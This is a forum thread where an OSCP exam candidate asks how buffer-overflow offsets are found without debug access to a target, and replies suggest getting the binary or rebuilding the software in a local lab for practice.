Find Buffer Overflows at a target you want to gain access

I want to pass my OSCP exam and I am learning with the material I got. I watched the videos and read the pdf but I have a question about buffer overflows.

In the example in the videos the guy has access to the target system and can so control, debug and restart the application. So he can see what length he should send to cause the buffer overflow and where the EIP register is in the sended string and so on.

But my intetion of a buffer overflow is to get access to a system I were not accessed before, isn't it?

So how do I get to know all the relevent data without having access like debug functions before?

Thanks in advance!


  • you will need some sort of access to the box. you need to have the binary. either you have the binary and disassemble it or if they have gdb-server and you can debug on the server.

  • The only way to achieve this without access to the physical system, ie you are logged into it would be the whole enumeration process. Scan the system, find the application and the replicate the system in a virtual environment. I have completed the OSCP and I had issues with the BoF, rather than pay for additional time in the labs I managed to find the software version used within the videos and construction a virtual lab for myself, to ensure that I fully understood the whole process.

    I have mention this before in other conversations when doing the BoF, check out John Hammond's video about OSCP, he make reference to BoF and what he did to achieve a shell.

Sign In to comment.